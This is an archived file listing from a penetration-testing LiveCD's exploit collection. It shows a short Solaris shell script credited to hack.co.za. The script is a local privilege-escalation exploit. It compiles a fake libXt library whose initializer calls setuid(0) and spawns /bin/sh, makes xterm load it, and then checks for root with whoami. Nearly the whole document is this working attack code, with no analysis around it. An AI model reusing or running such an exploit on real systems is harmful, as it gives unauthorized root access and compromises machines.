home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
livecd.squashfs
/
opt
/
pentoo
/
ExploitTree
/
system
/
solaris
/
local
/
x11r4.sh
< prev
next >
Wrap
Linux/UNIX/POSIX Shell Script
|
2005-02-12
|
374b
|
19 lines
#!/bin/sh
mkdir /tmp/xyzzy
cd /tmp/xyzzy
cat > Initialize.c << EOF
_XtAppInitialize() { setuid(0);
execl("/bin/sh","sh",0);}
XtAppSetFallbackResources() {}
_XtDisplayInitialize() {}
EOF
ar x /usr/lib/libXt.a
cc -c -pic Initialize.c
ld *.o
mkdir lib lib/X
mv a.out lib/X/libXt.so.4.1
cd lib/X
xterm
whoami
# www.hack.co.za [2000]#